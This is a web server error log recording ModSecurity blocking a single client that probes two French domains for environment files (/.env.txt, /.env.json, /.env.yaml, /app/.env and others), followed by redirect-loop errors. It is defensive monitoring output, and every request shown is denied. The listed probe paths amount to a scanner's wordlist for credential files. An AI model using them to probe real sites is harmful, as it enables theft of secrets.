[Mon May 11 16:25:24.596661 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:40720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.txt"] [unique_id "agHm1FV4kyjgo4bQBUhT5gAAAM4"]
[Mon May 11 16:25:24.596887 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:40720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.txt"] [unique_id "agHm1FV4kyjgo4bQBUhT5gAAAM4"]
[Mon May 11 16:25:24.597392 2026] [core:error] [pid 1416109:tid 1416144] [client 18.180.54.2:40720] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:24.597574 2026] [security2:error] [pid 1416109:tid 1416144] [client 18.180.54.2:40720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.txt"] [unique_id "agHm1FV4kyjgo4bQBUhT5gAAAM4"]
[Mon May 11 16:25:24.985183 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:40732] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env_copy"] [unique_id "agHm1EWKUxpmnkK7zHx7kAAAARY"]
[Mon May 11 16:25:24.985423 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:40732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env_copy"] [unique_id "agHm1EWKUxpmnkK7zHx7kAAAARY"]
[Mon May 11 16:25:24.985945 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:40732] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:24.988346 2026] [security2:error] [pid 1411055:tid 1411079] [client 18.180.54.2:40732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env_copy"] [unique_id "agHm1EWKUxpmnkK7zHx7kAAAARY"]
[Mon May 11 16:25:25.273260 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:40738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.json"] [unique_id "agHm1fy_GXSWIKeli0vx7AAAAJA"]
[Mon May 11 16:25:25.273494 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:40738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.json"] [unique_id "agHm1fy_GXSWIKeli0vx7AAAAJA"]
[Mon May 11 16:25:25.273977 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:40738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:25.274128 2026] [security2:error] [pid 1411201:tid 1411262] [client 18.180.54.2:40738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.json"] [unique_id "agHm1fy_GXSWIKeli0vx7AAAAJA"]
[Mon May 11 16:25:25.733728 2026] [security2:error] [pid 1412074:tid 1412080] [client 18.180.54.2:40754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.txt"] [unique_id "agHm1TJnyuKVXoStDha0PAAAAEQ"]
[Mon May 11 16:25:25.733967 2026] [security2:error] [pid 1412074:tid 1412080] [client 18.180.54.2:40754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.txt"] [unique_id "agHm1TJnyuKVXoStDha0PAAAAEQ"]
[Mon May 11 16:25:25.734515 2026] [core:error] [pid 1412074:tid 1412080] [client 18.180.54.2:40754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:25.735439 2026] [security2:error] [pid 1412074:tid 1412080] [client 18.180.54.2:40754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.txt"] [unique_id "agHm1TJnyuKVXoStDha0PAAAAEQ"]
[Mon May 11 16:25:25.953257 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:40758] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.yaml"] [unique_id "agHm1UWKUxpmnkK7zHx7kQAAAQg"]
[Mon May 11 16:25:25.953505 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:40758] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.yaml"] [unique_id "agHm1UWKUxpmnkK7zHx7kQAAAQg"]
[Mon May 11 16:25:25.953977 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:40758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:25.954135 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:40758] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.yaml"] [unique_id "agHm1UWKUxpmnkK7zHx7kQAAAQg"]
[Mon May 11 16:25:26.433843 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:40774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.json"] [unique_id "agHm1lV4kyjgo4bQBUhT6QAAAMQ"]
[Mon May 11 16:25:26.434077 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:40774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.json"] [unique_id "agHm1lV4kyjgo4bQBUhT6QAAAMQ"]
[Mon May 11 16:25:26.434564 2026] [core:error] [pid 1416109:tid 1416134] [client 18.180.54.2:40774] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:26.434727 2026] [security2:error] [pid 1416109:tid 1416134] [client 18.180.54.2:40774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.json"] [unique_id "agHm1lV4kyjgo4bQBUhT6QAAAMQ"]
[Mon May 11 16:25:26.671982 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40780] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.yml"] [unique_id "agHm1kWKUxpmnkK7zHx7kgAAAQw"]
[Mon May 11 16:25:26.672229 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40780] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.yml"] [unique_id "agHm1kWKUxpmnkK7zHx7kgAAAQw"]
[Mon May 11 16:25:26.672705 2026] [core:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40780] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:26.672867 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40780] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.yml"] [unique_id "agHm1kWKUxpmnkK7zHx7kgAAAQw"]
[Mon May 11 16:25:27.117527 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:40790] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yaml"] [unique_id "agHm11V4kyjgo4bQBUhT6gAAAM8"]
[Mon May 11 16:25:27.117772 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:40790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yaml"] [unique_id "agHm11V4kyjgo4bQBUhT6gAAAM8"]
[Mon May 11 16:25:27.118257 2026] [core:error] [pid 1416109:tid 1416145] [client 18.180.54.2:40790] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:27.118438 2026] [security2:error] [pid 1416109:tid 1416145] [client 18.180.54.2:40790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yaml"] [unique_id "agHm11V4kyjgo4bQBUhT6gAAAM8"]
[Mon May 11 16:25:27.404457 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:40798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agHm10WKUxpmnkK7zHx7kwAAARg"]
[Mon May 11 16:25:27.404671 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:40798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agHm10WKUxpmnkK7zHx7kwAAARg"]
[Mon May 11 16:25:27.405150 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:40798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:27.405313 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:40798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agHm10WKUxpmnkK7zHx7kwAAARg"]
[Mon May 11 16:25:27.839687 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:40812] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yml"] [unique_id "agHm1zJnyuKVXoStDha0QAAAAEA"]
[Mon May 11 16:25:27.839954 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:40812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yml"] [unique_id "agHm1zJnyuKVXoStDha0QAAAAEA"]
[Mon May 11 16:25:27.840644 2026] [core:error] [pid 1412074:tid 1412076] [client 18.180.54.2:40812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:27.840820 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:40812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.yml"] [unique_id "agHm1zJnyuKVXoStDha0QAAAAEA"]
[Mon May 11 16:25:28.102922 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:40822] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/apps/.env"] [unique_id "agHm2EWKUxpmnkK7zHx7lAAAAQo"]
[Mon May 11 16:25:28.103103 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:40822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/apps/.env"] [unique_id "agHm2EWKUxpmnkK7zHx7lAAAAQo"]
[Mon May 11 16:25:28.103578 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:40822] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:28.104228 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:40822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/apps/.env"] [unique_id "agHm2EWKUxpmnkK7zHx7lAAAAQo"]
[Mon May 11 16:25:28.578755 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:57926] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agHm2FV4kyjgo4bQBUhT7AAAANM"]
[Mon May 11 16:25:28.578986 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:57926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agHm2FV4kyjgo4bQBUhT7AAAANM"]
[Mon May 11 16:25:28.579491 2026] [core:error] [pid 1416109:tid 1416149] [client 18.180.54.2:57926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
